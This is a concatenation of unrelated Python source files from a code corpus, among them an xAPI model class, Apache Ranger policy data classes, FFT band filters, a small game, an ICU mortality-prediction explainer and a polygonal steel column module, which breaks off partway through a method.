:return: The choices of this XapiActivityDefinition.
:rtype: list[XapiInteractionComponent]
"""
return self._choices
@choices.setter
def choices(self, choices):
"""
Sets the choices of this XapiActivityDefinition.
:param choices: The choices of this XapiActivityDefinition.
:type: list[XapiInteractionComponent]
"""
self._choices = choices
@property
def scale(self):
"""
Gets the scale of this XapiActivityDefinition.
:return: The scale of this XapiActivityDefinition.
:rtype: list[XapiInteractionComponent]
"""
return self._scale
@scale.setter
def scale(self, scale):
"""
Sets the scale of this XapiActivityDefinition.
:param scale: The scale of this XapiActivityDefinition.
:type: list[XapiInteractionComponent]
"""
self._scale = scale
@property
def source(self):
"""
Gets the source of this XapiActivityDefinition.
:return: The source of this XapiActivityDefinition.
:rtype: list[XapiInteractionComponent]
"""
return self._source
@source.setter
def source(self, source):
"""
Sets the source of this XapiActivityDefinition.
:param source: The source of this XapiActivityDefinition.
:type: list[XapiInteractionComponent]
"""
self._source = source
@property
def target(self):
"""
Gets the target of this XapiActivityDefinition.
:return: The target of this XapiActivityDefinition.
:rtype: list[XapiInteractionComponent]
"""
return self._target
@target.setter
def target(self, target):
"""
Sets the target of this XapiActivityDefinition.
:param target: The target of this XapiActivityDefinition.
:type: list[XapiInteractionComponent]
"""
self._target = target
@property
def steps(self):
"""
Gets the steps of this XapiActivityDefinition.
:return: The steps of this XapiActivityDefinition.
:rtype: list[XapiInteractionComponent]
"""
return self._steps
@steps.setter
def steps(self, steps):
"""
Sets the steps of this XapiActivityDefinition.
:param steps: The steps of this XapiActivityDefinition.
:type: list[XapiInteractionComponent]
"""
self._steps = steps
@property
def extensions(self):
"""
Gets the extensions of this XapiActivityDefinition.
:return: The extensions of this XapiActivityDefinition.
:rtype: dict(str, object)
"""
return self._extensions
@extensions.setter
def extensions(self, extensions):
"""
Sets the extensions of this XapiActivityDefinition.
:param extensions: The extensions of this XapiActivityDefinition.
:type: dict(str, object)
"""
self._extensions = extensions
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, XapiActivityDefinition):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| 1.703125 | 2 |
rsa/src/crypto/hash.py | rafaelcn/cryptography | 0 | 12772877 | <filename>rsa/src/crypto/hash.py
"""
This file contains hash functions to help in signature verfication.
"""
import hashlib
def hashit(data):
"""
Hash function that returns a 32 byte digest of the application of SHA3 256
on data.
"""
return hashlib.sha3_256(data).digest()
| 2.4375 | 2 |
setup.py | emcek/ufc | 0 | 12772878 | import io
from os.path import abspath, dirname, join
from setuptools import setup, find_packages
from dcspy.dcs_g13 import __version__
here = abspath(dirname(__file__))
with io.open(join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
with io.open(join(here, 'requirements.txt'), encoding='utf-8') as f:
requires = f.read().splitlines()
setup(name='dcspy', # Required
version=__version__, # Required
description='Software for integrating DCS: F/A-18C, F-16C and Ka-50 with Logitech G13', # Required
long_description=long_description, # Optional
long_description_content_type='text/markdown', # Optional (see note above)
url='https://github.com/emcek/dcspy', # Optional
author='<NAME>', # Optional
license='MIT License',
entry_points={'console_scripts': ['dcs_g13 = dcspy.dcs_g13:run']},
data_files=[('dcspy_data', ['images/dcspy.ico'])],
classifiers=['Development Status :: 4 - Beta',
'Environment :: Console',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Operating System :: Microsoft :: Windows',
'Operating System :: Microsoft :: Windows :: Windows 10',
'Topic :: Games/Entertainment',
'Topic :: Games/Entertainment :: Simulation',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: System :: Hardware',
'Topic :: Utilities'],
keywords='logitech logitech-sdk logitech-keyboards logitech-gaming logitech-gaming-keyboard dcs-world dcs g13',
# packages=find_packages(exclude=['tests']), # Required
packages=find_packages(), # Required
install_requires=requires, # Optional
platforms=['win32', 'nt', 'Windows'],
# extras_require={'testing': ['pytest']},
project_urls={'Bug Reports': 'https://github.com/emcek/dcspy/issues',
'Source': 'https://github.com/emcek/dcspy'})
| 1.359375 | 1 |
examples/pythonic++_list.py | HighCWu/tpythonpp | 0 | 12772879 | with c++:
@module( mycppmodule )
def foo(a, o):
std::cout << a << std::endl
a.append( "world" )
a.append( std::string("mystdstring") )
a.append( o )
a.append( 1 )
a.append( 9.5 )
return None
import mycppmodule
x = ['hello']
b = 'bar'
mycppmodule.foo( x, b )
print( x )
| 2.953125 | 3 |
aiozmq-guide/rrworker-aio.py | r-marques/aiozmq-guide | 4 | 12772880 | <filename>aiozmq-guide/rrworker-aio.py<gh_stars>1-10
import asyncio
import aiozmq
import zmq
@asyncio.coroutine
def go():
"""
Request-reply service
Connects REP socket to tcp://localhost:5560
Expects "Hello" from client, replies with "World"
"""
# create REP socket
socket = yield from aiozmq.create_zmq_stream(zmq.REP, connect='tcp://localhost:5560')
while True:
message = yield from socket.read()
print('Received request: {}'.format(*message))
socket.write([b'World'])
if __name__ == "__main__":
print('Starting worker...')
asyncio.get_event_loop().run_until_complete(go())
| 2.890625 | 3 |
movie/merge_results.py | andytorrestb/piv_routines | 1 | 12772881 | import os
import save_figures as fig
from data_reader import DataReader
def merge_results(path):
sorted_files = sorted(os.listdir(path + 'left'))
rebuilt_img = []
dr = DataReader()
for file_name in sorted_files:
print('')
l_img = dr.load_pandas(path + 'left/' + file_name)
c_img = dr.load_pandas(path + 'center/' + file_name)
r_img = dr.load_pandas(path + 'right/' + file_name)
print(type(l_img), type(c_img), type(r_img))
img = l_img.append(c_img).append(r_img)
print(type(img))
dump_name = 'dump.' + file_name
img.to_csv(
path + dump_name,
sep =' ',
header = True,
quotechar = ' ',
index = False)
result_name = 'result.' + file_name
dump = open(path + dump_name, 'r+')
result = open(path + result_name, 'w')
header = "# " + dump.readline()
body = dump.read()
result.write(header)
result.write(body)
dump.close()
result.close()
| 2.78125 | 3 |
game03/satelliti.py | PythonBiellaGroup/LearningPythonWithGames | 2 | 12772882 | <reponame>PythonBiellaGroup/LearningPythonWithGames
import pgzrun
from random import randint
from time import time
TITLE = "🐍🐍 Connetti i satelliti 🐍🐍"
WIDTH = 800
HEIGHT = 600
satelliti = []
linee = []
indice_prossimo_satellite = 0
tempo_iniziale = 0
tempo_totale = 0
tempo_finale = 0
NUM_SATELLITI = 8
def crea_satelliti():
global tempo_iniziale
for count in range(0, NUM_SATELLITI):
satellite = Actor("satellite")
# Creazione della posizione in modo casuale
satellite.pos = randint(40, WIDTH-40), randint(40, HEIGHT-40)
# Aggiunta alla lista
satelliti.append(satellite)
tempo_iniziale = time()
def draw():
global tempo_totale
screen.blit("sfondo", (0,0))
numero = 1
for satellite in satelliti:
screen.draw.text(str(numero), (satellite.pos[0], satellite.pos[1]+20))
satellite.draw()
numero = numero + 1
for linea in linee:
# Le linee vengono disegnate in bianco
screen.draw.line(linea[0], linea[1], (255,255,255))
if indice_prossimo_satellite < NUM_SATELLITI:
tempo_totale = time() - tempo_iniziale
screen.draw.text(str(round(tempo_totale,2)), (10,10), fontsize=30)
#screen.draw.text(str(tempo_totale), (10,10), fontsize=30)
else:
screen.draw.text(str(round(tempo_totale,2)), (10,10), fontsize=30)
def update():
pass
def on_mouse_down(pos):
'''
Gestione click: se le connessioni non sono completate...
Se l'indice del satellite cliccato è quello corretto si aggiunge la linea
altrimenti si resetta
'''
global indice_prossimo_satellite, linee
if indice_prossimo_satellite < NUM_SATELLITI:
if satelliti[indice_prossimo_satellite].collidepoint(pos):
if indice_prossimo_satellite:
# La lista linee contiene tuple (posizione precedente, posizione successiva)
# Ogni posizione è a sua volta una tupla pos(x,y)
linee.append((satelliti[indice_prossimo_satellite-1].pos, satelliti[indice_prossimo_satellite].pos))
indice_prossimo_satellite = indice_prossimo_satellite + 1
else:
linee = []
indice_prossimo_satellite = 0
crea_satelliti()
pgzrun.go() | 3.65625 | 4 |
ex087.py | danoliveiradev/PythonExercicios | 0 | 12772883 | matriz = []
valor = []
somaPar = somaColuna3 = maiorLinha2 = 0
#Gerador de matriz 3x3
for i in range(0, 3):
for j in range(0, 3):
valor.append(int(input(f'Digite um valor para [{i}, {j}]: ')))
matriz.append(valor[:])
valor.clear()
print('-='*30)
for i in range(0, 3):
for j in range(0, 3):
print(f'[{matriz[i][j]:^5}]', end='') #Imprime a matriz 3x3
if matriz[i][j] % 2 == 0: #Análise soma dos pares
somaPar += matriz[i][j]
if j == 2: #Análise soma terceira coluna
somaColuna3 += matriz[i][j]
if i == 1: #Análise maior valor linha 2
if maiorLinha2 <= matriz[i][j]:
maiorLinha2 = matriz[i][j]
print()
print('-='*30)
print(f'Soma de todos os valores pares é {somaPar}.')
print(f'Soma dos valores da terceira coluna é {somaColuna3}.')
print(f'O maior valor da segunda linha é {maiorLinha2}.')
| 3.8125 | 4 |
mysite/benthic_photosynthesis_measurement.py | EggsWithCheese/WSU-PAL-PPC | 0 | 12772884 | '''
Created on Jun 17, 2015
@author: cdleong
'''
from photosynthesis_measurement import PhotosynthesisMeasurement
class BenthicPhotosynthesisMeasurement(PhotosynthesisMeasurement):
'''
classdocs
'''
MAX_VALID_IK = 10.0 #Arbitrary value one order of magnitude greater than typical. According to Kalff's Limnology, page 333, Ik typically falls between 0.14 and 0.72
MIN_VALID_IK = 0.01 #Arbitrary value one order of magnitude less than typical. According to Kalff's Limnology, page 333, Ik typically falls between 0.14 and 0.72
ik=0.0
def __init__(self, depth, pmax, ik):
super(BenthicPhotosynthesisMeasurement, self).__init__(depth, pmax)
self.set_ik(ik)
#GETTERS
def get_depth(self):
return PhotosynthesisMeasurement.get_depth(self)
def get_pmax(self):
return PhotosynthesisMeasurement.get_pmax(self)
def get_ik(self):
return self.__ik
#SETTERS
def set_depth(self, value):
#TODO: validate
return PhotosynthesisMeasurement.set_depth(self, value)
def set_pmax(self, value):
#TODO: validate
return PhotosynthesisMeasurement.set_pmax(self, value)
def set_ik(self, value):
#TODO: validate
self.__ik = value
def del_ik(self):
del self.__ik
def del_depth(self):
return PhotosynthesisMeasurement.del_depth(self)
def del_pmax(self):
return PhotosynthesisMeasurement.del_pmax(self)
#autogenerated by PyDev.
ik = property(get_ik, set_ik, del_ik, "ik's docstring")
def main():
print "hello world"
if __name__ == "__main__":
main() | 2.34375 | 2 |
intg/src/main/python/apache_ranger/model/ranger_policy.py | Eroschang/ranger | 11 | 12772885 | #!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from apache_ranger.model.ranger_base import RangerBase
class RangerPolicyResource:
def __init__(self, values=None, isExcludes=None, isRecursive=None):
self.values = values if values is not None else []
self.isExcludes = isExcludes if isExcludes is not None else False
self.isRecursive = isRecursive if isRecursive is not None else False
def __repr__(self):
return json.dumps(self, default=lambda x: x.__dict__, sort_keys=True, indent=4)
class RangerPolicyItemCondition:
def __init__(self, type=None, values=None):
self.type = type
self.values = values if values is not None else []
def __repr__(self):
return json.dumps(self, default=lambda x: x.__dict__, sort_keys=True, indent=4)
class RangerPolicyItem:
def __init__(self, accesses=None, users=None, groups=None, roles=None, conditions=None, delegateAdmin=None):
self.accesses = accesses if accesses is not None else []
self.users = users if users is not None else []
self.groups = groups if groups is not None else []
self.roles = roles if roles is not None else []
self.conditions = conditions if conditions is not None else []
self.delegateAdmin = delegateAdmin if delegateAdmin is not None else False
def __repr__(self):
return json.dumps(self, default=lambda x: x.__dict__, sort_keys=True, indent=4)
class RangerPolicyItemAccess:
def __init__(self, type=None, isAllowed=None):
self.type = type
self.isAllowed = isAllowed if isAllowed is not None else True
def __repr__(self):
return json.dumps(self, default=lambda x: x.__dict__, sort_keys=True, indent=4)
class RangerPolicyItemDataMaskInfo:
def __init__(self, dataMaskType=None, conditionExpr=None, valueExpr=None):
self.dataMaskType = dataMaskType
self.conditionExpr = conditionExpr
self.valueExpr = valueExpr
def __repr__(self):
return json.dumps(self, default=lambda x: x.__dict__, sort_keys=True, indent=4)
class RangerDataMaskPolicyItem(RangerPolicyItem):
def __init__(self, dataMaskInfo=None, accesses=None, users=None, groups=None, roles=None, conditions=None, delegateAdmin=None):
super().__init__(accesses, users, groups, roles, conditions, delegateAdmin)
self.dataMaskInfo = dataMaskInfo if dataMaskInfo is not None else RangerPolicyItemDataMaskInfo()
def __repr__(self):
return json.dumps(self, default=lambda x: x.__dict__, sort_keys=True, indent=4)
class RangerRowFilterPolicyItem(RangerPolicyItem):
def __init__(self, rowFilterInfo=None, accesses=None, users=None, groups=None, roles=None, conditions=None, delegateAdmin=None):
super().__init__(accesses, users, groups, roles, conditions, delegateAdmin)
self.rowFilterInfo = rowFilterInfo
def __repr__(self):
return json.dumps(self, default=lambda x: x.__dict__, sort_keys=True, indent=4)
class RangerPolicy(RangerBase):
def __init__(self, id=None, guid=None, createdBy=None, updatedBy=None, createTime=None, updateTime=None,
service=None, name=None, description=None, isEnabled=True, isAuditEnabled=None, resources=None,
policyItems=None, dataMaskPolicyItems=None, rowFilterPolicyItems=None, serviceType=None, options=None,
policyLabels=None, zoneName=None, isDenyAllElse=None, validitySchedules=None, version=None,
denyPolicyItems=None, denyExceptions=None, allowExceptions=None, resourceSignature=None,
policyType=None, policyPriority=None, conditions=None):
super().__init__(id, guid, createdBy, updatedBy, createTime, updateTime, version, isEnabled)
self.service = service
self.name = name
self.policyType = policyType
self.policyPriority = policyPriority if policyPriority is not None else 0
self.description = description
self.resourceSignature = resourceSignature
self.isAuditEnabled = isAuditEnabled if isAuditEnabled is not None else True
self.resources = resources if resources is not None else {}
self.policyItems = policyItems if policyItems is not None else []
self.denyPolicyItems = denyPolicyItems if denyPolicyItems is not None else []
self.allowExceptions = allowExceptions if allowExceptions is not None else []
self.denyExceptions = denyExceptions if denyExceptions is not None else []
self.dataMaskPolicyItems = dataMaskPolicyItems if dataMaskPolicyItems is not None else []
self.rowFilterPolicyItems = rowFilterPolicyItems if rowFilterPolicyItems is not None else []
self.serviceType = serviceType
self.options = options if options is not None else {}
self.validitySchedules = validitySchedules if validitySchedules is not None else []
self.policyLabels = policyLabels if policyLabels is not None else []
self.zoneName = zoneName
self.conditions = conditions
self.isDenyAllElse = isDenyAllElse if isDenyAllElse is not None else False
def __repr__(self):
return json.dumps(self, default=lambda x: x.__dict__, sort_keys=True, indent=4)
| 2.109375 | 2 |
BandFilter.py | FullPint/Frequency-Filter-Server | 0 | 12772886 | import numpy as np
import math as math
import cv2
def get_ideal_low_pass_filter( shape, cutoff,width):
[h, w] = shape
mask_image = np.zeros((h, w))
for i in range(h):
for j in range(w):
distance = math.sqrt((i - (h / 2)) * (i - (h / 2)) + (j - (w / 2)) * (j - (w / 2)))
if distance >= cutoff-(width/2) and distance <= cutoff+(width/2):
mask_image[i][j] = 0
else:
mask_image[i][j] = 1
return mask_image
def get_ideal_high_pass_filter( shape, cutoff,width):
mask_image = 1 - get_ideal_low_pass_filter(shape, cutoff,width)
return mask_image
def get_butterworth_low_pass_filter( shape, cutoff,order,width):
[h, w] = shape
mask_image = np.zeros((h, w))
for i in range(h):
for j in range(w):
distance = math.sqrt((i - (h / 2)) ** 2 + ((j - (w / 2)) ** 2))
if distance ** 2 - cutoff ** 2 == 0:
mask_image[i][j] = 0
else:
mask_image[i][j] = 1 / (1 + (((distance * width) / (distance ** 2 - cutoff ** 2)) ** (2 * order)))
return mask_image
def get_butterworth_high_pass_filter( shape, cutoff,order,width):
mask_image = 1 - get_butterworth_low_pass_filter(shape, cutoff,order,width)
return mask_image
def get_gaussian_low_pass_filter(shape, cutoff,width):
[h, w] = shape
mask_image = np.zeros((h, w))
for i in range(h):
for j in range(w):
distance = math.sqrt((i - (h / 2)) ** 2 + ((j - (w / 2)) ** 2))
if (distance == 0):
mask_image[i][j] = 0
else:
mask_image[i][j] = 1 - math.exp(-(((distance ** 2 - cutoff ** 2) / (distance * width)) ** 2))
return mask_image
def get_gaussian_high_pass_filter(shape, cutoff,width):
mask_image = 1 - get_gaussian_low_pass_filter(shape, cutoff,width)
return mask_image
def post_process_image(image):
c_min = np.min(image)
c_max = np.max(image)
new_min = 0
new_max = 255
stretch_image = np.zeros((np.shape(image)), dtype=np.uint8)
for i in range(0, image.shape[0]):
for j in range(0, image.shape[1]):
stretch_image[i][j] = (image[i][j] - c_min) * ((new_max - new_min) / (c_max - c_min)) + new_min
return stretch_image
def filtering_band_filter(image,cutoff,width,filtertype):
s = image.shape
fft_image = np.fft.fft2(image)
shift_image = np.fft.fftshift(fft_image)
dft_image = np.uint8(np.log(np.absolute(shift_image)) * 10)
if filtertype=='Ideal Low Pass' :
mask = get_ideal_low_pass_filter(s, cutoff,width)
elif filtertype=='Ideal High Pass' :
mask=get_ideal_high_pass_filter(s, cutoff,width)
elif filtertype=='Gaussain Low Pass':
mask=get_gaussian_low_pass_filter(s,cutoff,width)
elif filtertype=='Gaussian High Pass':
mask=get_gaussian_high_pass_filter(s,cutoff,width)
elif filtertype=='Butterworth Low Pass':
mask=get_butterworth_low_pass_filter(s,cutoff,width,order=2)
else:
mask=0
filter_image = shift_image * mask
filter_finalimg =np.uint8(np.log(np.absolute(filter_image))*10)
ishift_image = np.fft.ifftshift(filter_image)
ifft_image = np.fft.ifft2(ishift_image)
mag_image = np.absolute(ifft_image)
f = post_process_image(mag_image)
return [f,filter_finalimg]
def filtering_band_filter_order(image,cutoff,order,width,filtertype):
s = image.shape
fft_image = np.fft.fft2(image)
shift_image = np.fft.fftshift(fft_image)
dft_image = np.uint8(np.log(np.absolute(shift_image)) * 10)
if filtertype=='Butterworth Low Pass':
mask=get_butterworth_low_pass_filter(s,cutoff,order,width)
else:
mask=get_butterworth_high_pass_filter(s,cutoff,order,width)
filter_image = shift_image * (mask*200)
# filter_finalimg1= np.log(np.absolute(filter_image)) * 10
filter_finalimg = np.uint8(np.log(np.absolute(filter_image)) * 10)
# cv2.imshow("ButterLow",filter_finalimg)
#cv2.waitKey(0)
ishift_image = np.fft.ifftshift(filter_image)
ifft_image = np.fft.ifft2(ishift_image)
mag_image = np.absolute(ifft_image)
f = post_process_image(mag_image)
return [f,filter_finalimg]
| 2.765625 | 3 |
website/products/index.py | zckoh/ecommerce-fullstack | 1 | 12772887 | from algoliasearch_django import AlgoliaIndex
from algoliasearch_django.decorators import register
from .models import Product
@register(Product)
class ProductIndex(AlgoliaIndex):
fields = ('product_name', 'model_no', 'product_category',
'product_details', 'slug', 'main_product_image')
| 1.742188 | 2 |
iseeu/iseeu.py | overfree/ISeeU | 20 | 12772888 | <gh_stars>10-100
from keras.models import Model, load_model
import matplotlib as mpl
import matplotlib.cm as cm
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import deeplift
from deeplift.layers import NonlinearMxtsMode
from deeplift.conversion import kerasapi_conversion as kc
from deeplift.util import compile_func
import pkg_resources
class ISeeU:
__version__ = "0.1.2"
_predictor_names = ['AGE', 'AIDS', 'BICARBONATE', 'BILIRRUBIN', 'BUN',
'DIASTOLIC BP', 'ELECTIVE', 'Fi02', 'GCSEyes', 'GCSMotor', 'GCSVerbal',
'HEART RATE', 'LYMPHOMA', 'METASTATIC CANCER', 'PO2', 'POTASSIUM', 'SODIUM',
'SURGICAL', 'SYSTOLIC BP', 'TEMPERATURE', 'URINE OUTPUT', 'WBC']
_mean = np.array([[6.34243460e+01],
[1.15991138e-02],
[2.35914714e+01],
[2.03752342e+00],
[2.58391275e+01],
[5.91375639e+01],
[1.42447543e-01],
[2.97559969e+01],
[3.22050524e+00],
[5.25573345e+00],
[3.22759360e+00],
[8.66774736e+01],
[3.08875277e-02],
[5.55193536e-02],
[1.25386686e+02],
[4.09971018e+00],
[1.38761390e+02],
[4.43503193e-01],
[1.20239568e+02],
[3.70007987e+01],
[1.38921403e+02],
[1.27906951e+01]])
_std = np.array([[1.57299432e+01],
[1.07079730e-01],
[4.47612455e+00],
[4.66545958e+00],
[2.08943192e+01],
[1.32289819e+01],
[3.49531348e-01],
[2.62710231e+01],
[1.10602245e+00],
[1.44245692e+00],
[1.89790566e+00],
[1.76732764e+01],
[1.73024247e-01],
[2.29006091e-01],
[6.59593339e+01],
[5.82762482e-01],
[4.62377559e+00],
[4.96830233e-01],
[2.15098339e+01],
[7.92864147e-01],
[1.72131946e+02],
[9.74428591e+00]])
_palette = plt.get_cmap('tab10')
def __init__(self):
model_file = pkg_resources.resource_filename('iseeu', 'models/kfold4_best.hdf5')
print(f"****{model_file}*****")
self._model = load_model(model_file)
dm = kc.convert_model_from_saved_files(
h5_file=model_file,
nonlinear_mxts_mode=NonlinearMxtsMode.RevealCancel, verbose=False)
self._deeplift_model = dm
input_layer_name = self._deeplift_model.get_input_layer_names()[0]
self._importance_func = self._deeplift_model.get_target_contribs_func(
find_scores_layer_name=input_layer_name, pre_activation_target_layer_name='preact_fc2_0')
def predict(self, patient_tensor):
if patient_tensor.shape != (1, 22, 48):
raise ValueError(
"Wrong tensor shape. The patient tensor shape should be (1,22,48).")
patient_tensor = np.nan_to_num((patient_tensor - self._mean)/self._std)
patient_tensor = patient_tensor[:, None]
prediction = self._model.predict(patient_tensor)
scores = np.array(
self._importance_func(task_idx=0, input_data_list=[patient_tensor],
input_references_list=[
np.zeros_like(patient_tensor)],
batch_size=1, progress_update=None))
return prediction[0][0], scores[0][0]
def visualize_patient_scores(self, patient_tensor, importance_scores=None, cycle_colors=True, filename=None,
cmap='coolwarm'):
if patient_tensor.shape != (1, 22, 48):
raise ValueError(
"Wrong tensor shape. The patient tensor shape should be (1,22,48).")
if importance_scores is not None and importance_scores.shape != (22, 48):
raise ValueError(
"Wrong tensor shape. The scores tensor shape should be (22,48).")
patient_tensor = patient_tensor[0]
if importance_scores is not None:
norm = MidpointNormalize(vmin=importance_scores.min(
), vmax=importance_scores.max(), midpoint=0)
scaled_scores = norm(importance_scores)
heatmap_cm = cm.get_cmap(cmap)
heatmap_colors = heatmap_cm(scaled_scores)
colorbar_ticks = np.concatenate((np.linspace(0, importance_scores.min(), 3, endpoint=False),
np.linspace(0, importance_scores.max(), 3)))
fig, ax = plt.subplots(11, 2, sharex='col', figsize=(30, 20))
for i, v in enumerate(self._predictor_names):
if v in ('AIDS', 'ELECTIVE', 'METASTATIC_CANCER', 'LYMPHOMA', 'SURGICAL', 'ELECTIVE'):
ax[int(i // 2), i % 2].set_ylim((-2, 2))
ax[int(i // 2), i % 2].plot(range(48), patient_tensor[i],
lw=2.5, color=self._palette(i % 10) if cycle_colors else self._palette(0),
marker='o', markersize=6)
ax[int(i // 2), i % 2].legend([v], loc='upper left')
if importance_scores is not None:
if len(heatmap_colors.shape) == 3:
for j in range(48):
ax[int(i // 2), i % 2].axvspan(j, j+1,
facecolor=heatmap_colors[i, j], alpha=0.5)
else:
ax[int(i // 2), i % 2].axvspan(0, 48,
facecolor=heatmap_colors[i], alpha=0.5)
if importance_scores is not None:
ax_cb = fig.add_axes([0.92, 0.125, 0.015, 0.755])
cb1 = mpl.colorbar.ColorbarBase(
ax_cb, cmap=cmap, norm=norm, ticks=colorbar_ticks, orientation='vertical')
plt.subplots_adjust(wspace=0.05)
if filename is not None:
plt.savefig(filename, dpi=200, bbox_inches='tight')
plt.show()
def visualize_evidence(self, importance_scores, filename=None, figsize=(20, 15)):
if importance_scores.shape != (22, 48):
raise ValueError(
"Wrong tensor shape. The scores tensor shape should be (22,48).")
norm = np.sum(np.abs(importance_scores), axis=1)
positive_contribs = np.sum(importance_scores.clip(min=0), axis=1)
negative_contribs = np.sum(importance_scores.clip(max=0), axis=1)
df = pd.DataFrame(index=self._predictor_names, data={'Negative contribution': negative_contribs,
'Positive contribution': positive_contribs})
df.plot.barh(figsize=figsize, color=[
self._palette(0), self._palette(3)])
if filename is not None:
plt.savefig(filename, dpi=200)
# set the colormap and centre the colorbar
# http://chris35wills.github.io/matplotlib_diverging_colorbar/
class MidpointNormalize(mpl.colors.Normalize):
"""
Normalise the colorbar so that diverging bars work there way either side from a prescribed midpoint value)
e.g. im=ax1.imshow(array, norm=MidpointNormalize(midpoint=0.,vmin=-100, vmax=100))
"""
def __init__(self, vmin=None, vmax=None, midpoint=None, clip=False):
self.midpoint = midpoint
mpl.colors.Normalize.__init__(self, vmin, vmax, clip)
def __call__(self, value, clip=None):
x, y = [self.vmin, self.midpoint, self.vmax], [0, 0.5, 1]
return np.ma.masked_array(np.interp(value, x, y), np.isnan(value))
| 1.835938 | 2 |
dataset.py | Westerley/framework_event2vec | 1 | 12772889 | <reponame>Westerley/framework_event2vec
import pandas as pd
import networkx as nx
import argparse
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--edges', type=str, help='input csv file')
parser.add_argument('--sep', type=str, default='\t')
parser.add_argument('--output', type=str)
return parser.parse_args()
def get_node(node):
return node.strip().split(':')[0]
def get_type(node):
return node.strip().split(':')[1]
def main(args):
edges = pd.read_csv(args.edges, sep=args.sep, names=['node1', 'node2', 'weight'])
G = nx.Graph()
edges['type1'] = edges['node1'].apply(get_type)
edges['node1'] = edges['node1'].apply(get_node)
edges['type2'] = edges['node2'].apply(get_type)
edges['node2'] = edges['node2'].apply(get_node)
for i, n in edges.iterrows():
G.add_edge(n['node1'], n['node2'], weight=n['weight'])
for i, n in edges.iterrows():
G.nodes[n['node1']]['type'] = n['type1']
G.nodes[n['node2']]['type'] = n['type2']
nx.write_gpickle(G, 'datasets/%s' %args.output)
if __name__ == "__main__":
args = parse_args()
print(args.sep)
main(args)
| 2.75 | 3 |
libaarhusxyz/__init__.py | emerald-geomodelling/libaarhusxyz | 0 | 12772890 | <filename>libaarhusxyz/__init__.py
from .xyz import parse
from .xyz import dump
from .sr2 import parse as parse_sr2
from .gex import parse as parse_gex
| 1.03125 | 1 |
PySS/polygonal.py | manpan-1/steel_toolbox | 2 | 12772891 | <reponame>manpan-1/steel_toolbox
# -*- coding: utf-8 -*-
"""
A framework for the study of polygonal profiles.
"""
import os
import numpy as np
import PySS.steel_design as sd
import PySS.lab_tests as lt
import PySS.analytic_geometry as ag
import PySS.scan_3D as s3d
import pickle
from matplotlib import pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
class PolygonalColumn:
"""
Polygonal column.
"""
def __init__(self, name=None, theoretical_specimen=None, real_specimen=None, experiment_data=None):
self.name = name
self.theoretical_specimen = theoretical_specimen
self.real_specimen = real_specimen
self.experiment_data = experiment_data
def add_theoretical_specimen(self,
n_sides,
length,
f_yield,
fab_class,
r_circle=None,
p_class=None,
thickness=None
):
if [i is None for i in [r_circle, p_class, thickness]].count(True) > 1:
print('Not enough info. Two out of the three optional arguments {r_circle, p_class, thickness}'
' must be given.')
return
else:
if p_class is None:
self.theoretical_specimen = TheoreticalSpecimen.from_geometry(
n_sides,
r_circle,
thickness,
length,
f_yield,
fab_class
)
elif r_circle is None:
self.theoretical_specimen = TheoreticalSpecimen.from_slenderness_and_thickness(
n_sides,
p_class,
thickness,
length,
f_yield,
fab_class
)
else:
self.theoretical_specimen = TheoreticalSpecimen.from_slenderness_and_radius(
n_sides,
r_circle,
p_class,
length,
f_yield,
fab_class
)
def add_real_specimen(self, path):
"""
Add data from scanning pickle file.
Adds a self.specimen object of the RealSpecimen class. Scanned data are loaded from a list of pickle files
corresponding to sides and edges, each file containing point coordinates. The pickle files are assumed to follow
the the filename structure:
files with points of sides: `side_XX.pkl`
files iwth points od edges: `edge_XX.pkl`
where `XX` is an ascending number starting from 01.
Parameters
----------
path : str
Path containing side_XX.pkl and edge_XX.pkl files. eg `/home/user/` (terminating backslash required).
"""
# Scan the given path for filenames.
file_list = os.listdir(path)
n_sides, n_edges = 0, 0
side_filename_numbers, edge_filename_numbers = [], []
for fname in file_list:
if fname[-4:] == '.pkl':
if fname[:5] == 'side_':
n_sides = n_sides + 1
side_filename_numbers.append(int(fname[5:7]))
if fname[:5] == 'edge_':
n_edges = n_edges + 1
edge_filename_numbers.append(int(fname[5:7]))
if n_sides == 0 and n_edges == 0:
print('No side or edge files were found in the directory.')
return NotImplemented
# Sort the numbers fetched from the filenames and check if they are sequential or if there are numbers missing.
side_filename_numbers.sort()
edge_filename_numbers.sort()
if (not all([x == num - 1 for x, num in enumerate(side_filename_numbers)]) and
not all([x == num - 1 for x, num in enumerate(edge_filename_numbers)])):
print("Problem with filenames. Check if the filenames are correct (see method's documentation) ant the "
"numbering in the filenames is sequential (no sides or edges missing)")
return NotImplemented
# Create a polygon specimen object.
if self.theoretical_specimen is None:
print('No theoretical specimen defined. Before adding data of the real scanned specimen, it is necessary '
'to create the corresponding theoretical specimen.')
return
else:
specimen = RealSpecimen(thickness=self.theoretical_specimen.geometry.thickness)
# Add a center line for the specimen.
# TODO: add real centreline from file.
print('Adding centre-line from pickle.')
